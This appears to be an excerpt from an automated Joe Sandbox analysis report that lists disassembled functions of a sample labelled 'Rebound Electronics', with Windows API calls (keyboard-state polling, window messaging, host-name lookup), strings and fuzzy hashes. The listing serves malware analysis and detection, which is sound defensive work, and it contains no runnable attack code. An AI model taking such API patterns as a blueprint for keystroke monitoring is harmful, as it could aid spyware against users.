SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C67833
SendMessageW.USER32(00000010,00000000,00000000), ref: 00C67852
Sleep.KERNEL32(000000FA), ref: 00C6785D
IsWindow.USER32 ref: 00C67869
EndDialog.USER32(00000000), ref: 00C6787A

Strings

BUTTON, xrefs: 00C677F8

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 4920736b242abb5d59a742be2e8855ce9a67bfad8680118e995fad9ee6eaea2c
Instruction ID: 9ebd649c8fff5aea7b7cd5d8805313c2a283e403b904d30d4f2a212c253ce79e
Opcode Fuzzy Hash: 4920736b242abb5d59a742be2e8855ce9a67bfad8680118e995fad9ee6eaea2c
Instruction Fuzzy Hash: 73215BB0204685AFE7215B60ECCDF2E3F6AFB0934CF040A64F517975B2CB65AD01EA21

Function 00C702EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON

Download Yara Rule

APIs

Part of subcall function 00C2936C: __swprintf.LIBCMT ref: 00C293AB
Part of subcall function 00C2936C: __itow.LIBCMT ref: 00C293DF

CoInitialize.OLE32(00000000), ref: 00C7034B
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C703DE
SHGetDesktopFolder.SHELL32(?), ref: 00C703F2
CoCreateInstance.OLE32(00CADA8C,00000000,00000001,00CD3CF8,?), ref: 00C7043E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C704AD
CoTaskMemFree.OLE32(?,?), ref: 00C70505
_memset.LIBCMT ref: 00C70542
SHBrowseForFolderW.SHELL32(?), ref: 00C7057E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C705A1
CoTaskMemFree.OLE32(00000000), ref: 00C705A8
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00C705DF
CoUninitialize.OLE32(00000001,00000000), ref: 00C705E1

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 40d26202fe1f02385c8dc13a1bab54781706ffa7e2028b26fd04e3e3b09d72aa
Instruction ID: bf5271c03cebe3c82b41fca91241febbdf0a14088d6f925b4d6f2e654a70e61c
Opcode Fuzzy Hash: 40d26202fe1f02385c8dc13a1bab54781706ffa7e2028b26fd04e3e3b09d72aa
Instruction Fuzzy Hash: EFB1E975A00119EFDB14DFA4C889EAEBBB9FF48304B148469E81AEB251D730EE41CB54

Function 00C62E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00C62ED6
SetKeyboardState.USER32(?), ref: 00C62F41
GetAsyncKeyState.USER32(000000A0), ref: 00C62F61
GetKeyState.USER32(000000A0), ref: 00C62F78
GetAsyncKeyState.USER32(000000A1), ref: 00C62FA7
GetKeyState.USER32(000000A1), ref: 00C62FB8
GetAsyncKeyState.USER32(00000011), ref: 00C62FE4
GetKeyState.USER32(00000011), ref: 00C62FF2
GetAsyncKeyState.USER32(00000012), ref: 00C6301B
GetKeyState.USER32(00000012), ref: 00C63029
GetAsyncKeyState.USER32(0000005B), ref: 00C63052
GetKeyState.USER32(0000005B), ref: 00C63060

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 111d3ab365a9b83df1472fd4d9b808cb0ee1559c90a228292f425cc799edcb8a
Instruction ID: ad5ed310a911ca1b041c191b8a95317ff7339079abc67faf1b5b76c6e3b748df
Opcode Fuzzy Hash: 111d3ab365a9b83df1472fd4d9b808cb0ee1559c90a228292f425cc799edcb8a
Instruction Fuzzy Hash: 4451F760A08BD829FB35DBA488907EEBFF45F12344F08459DC5D25A1C2DA549B8CD7A2

Function 00C5ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00C5ED1E
GetWindowRect.USER32(00000000,?), ref: 00C5ED30
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C5ED8E
GetDlgItem.USER32(?,00000002), ref: 00C5ED99
GetWindowRect.USER32(00000000,?), ref: 00C5EDAB
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C5EE01
GetDlgItem.USER32(?,000003E9), ref: 00C5EE0F
GetWindowRect.USER32(00000000,?), ref: 00C5EE20
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C5EE63
GetDlgItem.USER32(?,000003EA), ref: 00C5EE71
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C5EE8E
InvalidateRect.USER32(?,00000000,00000001), ref: 00C5EE9B

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: d0f9ae93197ad89ebee200cbab4b4d4d94bf7cb2dd3b41a6a2a2c052b92a5a01
Instruction ID: b49e0ce45c8281acdeab3de3dd366041a365553d303ce215009b1e0dfc80efae
Opcode Fuzzy Hash: d0f9ae93197ad89ebee200cbab4b4d4d94bf7cb2dd3b41a6a2a2c052b92a5a01
Instruction Fuzzy Hash: A35143B5B00205AFDB18CF68CD85BAEBBB6FB89305F14852DF91AD7290D7709E448B10

Function 00C3B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C3B759,?,00000000,?,?,?,?,00C3B72B,00000000,?), ref: 00C3BA58

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00C3B72B), ref: 00C3B7F6
KillTimer.USER32(00000000,?,00000000,?,?,?,?,00C3B72B,00000000,?,?,00C3B2EF,?,?), ref: 00C3B88D
DestroyAcceleratorTable.USER32(00000000), ref: 00C9D8A6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C3B72B,00000000,?,?,00C3B2EF,?,?), ref: 00C9D8D7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C3B72B,00000000,?,?,00C3B2EF,?,?), ref: 00C9D8EE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C3B72B,00000000,?,?,00C3B2EF,?,?), ref: 00C9D90A
DeleteObject.GDI32(00000000), ref: 00C9D91C

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 99127f71dd90024a390fa953ca9dae57bc14495affe56d54179656a75425beda
Instruction ID: efd708908ea285939749a612a6c417fd23a24288df2ca1cfb5145d9f2d74b6b4
Opcode Fuzzy Hash: 99127f71dd90024a390fa953ca9dae57bc14495affe56d54179656a75425beda
Instruction Fuzzy Hash: 1E61AA30510640CFDB25AF19D888B69B7F9FF92316F19041DF6539BAA0CB30ADA0DB91

Function 00C3B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 00C3B526: GetWindowLongW.USER32(?,000000EB), ref: 00C3B537

GetSysColor.USER32(0000000F), ref: 00C3B438

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 9ec4ae8f42807bbfb5ad26c0099d959d70c929b2b9ecc82cdeee5e9b78455902
Instruction ID: 4d6a43fc6749809643018648f34508ed0236c006d23ef3452f261b6f23283a79
Opcode Fuzzy Hash: 9ec4ae8f42807bbfb5ad26c0099d959d70c929b2b9ecc82cdeee5e9b78455902
Instruction Fuzzy Hash: C441BB30110144ABDF246F289889BBD3B66AB06734F184265FE678B5E2D7318E42DB26

Function 00C6690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 00C66923
_wcscpy.LIBCMT ref: 00C66934
__wsplitpath.LIBCMT ref: 00C66958
__wsplitpath.LIBCMT ref: 00C66979
_wcscpy.LIBCMT ref: 00C6699B
_wcscpy.LIBCMT ref: 00C669B9
_wcscpy.LIBCMT ref: 00C669C7
_wcscat.LIBCMT ref: 00C669D6
_wcscat.LIBCMT ref: 00C66A2B
_wcscat.LIBCMT ref: 00C66A61
_wcscat.LIBCMT ref: 00C66A73

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: 9b0526655a7ad4cb2b030bd49de6e2014b214345291f6c511479ae7ee58c1051
Instruction ID: eeb1e2d93bf29fb34249d69071e3cc0a6883625197945b55997305b0f46925bd
Opcode Fuzzy Hash: 9b0526655a7ad4cb2b030bd49de6e2014b214345291f6c511479ae7ee58c1051
Instruction Fuzzy Hash: 6A411F7688521CAECF61EB94CC85DDF73BCFB44300F1041A6BA59A2051EB30ABE99F51

Function 00C6D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00CBDC00,00CBDC00,00CBDC00), ref: 00C6D7CE
GetDriveTypeW.KERNEL32(?,00CD3A70,00000061), ref: 00C6D898
_wcscpy.LIBCMT ref: 00C6D8C2

Strings

ramdisk, xrefs: 00C6D842
all, xrefs: 00C6D7D4
unknown, xrefs: 00C6D859
cdrom, xrefs: 00C6D7EA
removable, xrefs: 00C6D800
network, xrefs: 00C6D82C
fixed, xrefs: 00C6D816

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 3dcd7467ab3b19e7bc793855a63e499dbab5bf042c46ec6ba9d2ff3df6708c9c
Instruction ID: af964437523477b7b9af267367a6aa764e4eba0ea07fbb8207c449ca6751d025
Opcode Fuzzy Hash: 3dcd7467ab3b19e7bc793855a63e499dbab5bf042c46ec6ba9d2ff3df6708c9c
Instruction Fuzzy Hash: 9B5182716143409FCB10EF14D8D1AAEB7A5EF94314F10892DF5AA572E2DB31DE05DB82

Function 00C2936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00C293AB
__itow.LIBCMT ref: 00C293DF

Part of subcall function 00C41557: _xtow@16.LIBCMT ref: 00C41578

Strings

%.15g, xrefs: 00C293A5
True, xrefs: 00C94C8C
False, xrefs: 00C94C93
0x%p, xrefs: 00C94CAD

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: 2ebb1000401504975ba083e506229eab5c7ed15a7e2084d9bc17e9e44ed8be08
Instruction ID: bcb028136abb128c0b79a3085e2084e63d9c1f88dc507323686854d9e5033569
Opcode Fuzzy Hash: 2ebb1000401504975ba083e506229eab5c7ed15a7e2084d9bc17e9e44ed8be08
Instruction Fuzzy Hash: 21410631900214EFDB28DF78E946E6A73E8FF48300F24446EE55AD76D1EA31DA42DB11

Function 00C8A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00C8A259
CreateCompatibleDC.GDI32(00000000), ref: 00C8A260
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00C8A273
SelectObject.GDI32(00000000,00000000), ref: 00C8A27B
GetPixel.GDI32(00000000,00000000,00000000), ref: 00C8A286
DeleteDC.GDI32(00000000), ref: 00C8A28F
GetWindowLongW.USER32(?,000000EC), ref: 00C8A299
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00C8A2AD
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00C8A2B9

Strings

static, xrefs: 00C8A1F1

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 4eace5c5a59837648c4ba66c6b4885582b2db79b78dec8173494cc12412b7963
Instruction ID: ccbb4e267241946379e0db3e96ea443c2a9fc6e13cdaecc41c35eebb202945e2
Opcode Fuzzy Hash: 4eace5c5a59837648c4ba66c6b4885582b2db79b78dec8173494cc12412b7963
Instruction Fuzzy Hash: 83317031100115BBEF21AFA4DC49FDE3B69FF0E768F110215FA2AA61A0C735D811DB65

Function 00C66F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00C66F1D
gethostname.WSOCK32(?,00000100), ref: 00C66F37
gethostbyname.WSOCK32(?), ref: 00C66F44
_wcscpy.LIBCMT ref: 00C66F6C
inet_ntoa.WSOCK32(?), ref: 00C66F8A
_strcat.LIBCMT ref: 00C66F98
_wcscpy.LIBCMT ref: 00C66FAF
WSACleanup.WSOCK32 ref: 00C66FBD
_wcscpy.LIBCMT ref: 00C66FCB

Strings

0.0.0.0, xrefs: 00C66F66

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2620052-3771769585
Opcode ID: f9074010b4d36e53c6cd1b32c4007f7aefe7672e626831e64444ca37bef0e652
Instruction ID: 2cbd599169a4d194beee1cd2440f14585c245eb92ee7b4d978d228137d9ebdca
Opcode Fuzzy Hash: f9074010b4d36e53c6cd1b32c4007f7aefe7672e626831e64444ca37bef0e652
Instruction Fuzzy Hash: 6C11E172904215ABCB24ABB0EC8AFDE77ACEF41714F100069F116E6081EF709A859B62

Function 00C4500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C45047

Part of subcall function 00C47C0E: __getptd_noexit.LIBCMT ref: 00C47C0E

__gmtime64_s.LIBCMT ref: 00C450E0
__gmtime64_s.LIBCMT ref: 00C45116
__gmtime64_s.LIBCMT ref: 00C45133
__allrem.LIBCMT ref: 00C45189
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C451A5
__allrem.LIBCMT ref: 00C451BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C451DA
__allrem.LIBCMT ref: 00C451F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C4520F
__invoke_watson.LIBCMT ref: 00C45280

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction ID: 990cb6c9c4035010f49d16f282a9c547654bb140a3da6893f5d91e3f4052dac2
Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction Fuzzy Hash: 4871DA76A00F17ABE7249E79CC81B6A73A8BF01764F14422AF914D7682E770DE4497D0

Function 00C64DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C64DF8
GetMenuItemInfoW.USER32(00CE1708,000000FF,00000000,00000030), ref: 00C64E59
SetMenuItemInfoW.USER32(00CE1708,00000004,00000000,00000030), ref: 00C64E8F
Sleep.KERNEL32(000001F4), ref: 00C64EA1
GetMenuItemCount.USER32(?), ref: 00C64EE5
GetMenuItemID.USER32(?,00000000), ref: 00C64F01
GetMenuItemID.USER32(?,-00000001), ref: 00C64F2B
GetMenuItemID.USER32(?,?), ref: 00C64F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C64FB6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C64FCA
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C64FEB

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 40041876e291df8d1bc38dccc90ab66b783027166584595f228c6cdf088c7aec
Instruction ID: 3559a7fe65bb486a3775430c5c39e4658887d26f704b409172425ec66415fb29
Opcode Fuzzy Hash: 40041876e291df8d1bc38dccc90ab66b783027166584595f228c6cdf088c7aec
Instruction Fuzzy Hash: D76192B1900249EFDB35CFA4D8C8AAEBBB8FB45308F144059F852A7251D731AE45DB21

Function 00C89C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C89C98
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C89C9B
GetWindowLongW.USER32(?,000000F0), ref: 00C89CBF
_memset.LIBCMT ref: 00C89CD0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C89CE2
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C89D5A

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 120f29664799515e796b47d1288bbf1df3b48011c8365a1ce457f6ed77223c0c
Instruction ID: 4d43205ec00f7f27a9e5727948a50a15583adfed7ab1dba485d0b96dff08f914
Opcode Fuzzy Hash: 120f29664799515e796b47d1288bbf1df3b48011c8365a1ce457f6ed77223c0c
Instruction Fuzzy Hash: 8F618C75900248AFDB10DFA8CC81FFE77B8EB09704F18415AFA15AB291D770AE41DB54

Function 00C594E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00C594FE
SafeArrayAllocData.OLEAUT32(?), ref: 00C59549
VariantInit.OLEAUT32(?), ref: 00C5955B
SafeArrayAccessData.OLEAUT32(?,?), ref: 00C5957B
VariantCopy.OLEAUT32(?,?), ref: 00C595BE
SafeArrayUnaccessData.OLEAUT32(?), ref: 00C595D2
VariantClear.OLEAUT32(?), ref: 00C595E7
SafeArrayDestroyData.OLEAUT32(?), ref: 00C595F4
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C595FD
VariantClear.OLEAUT32(?), ref: 00C5960F
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C5961A

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

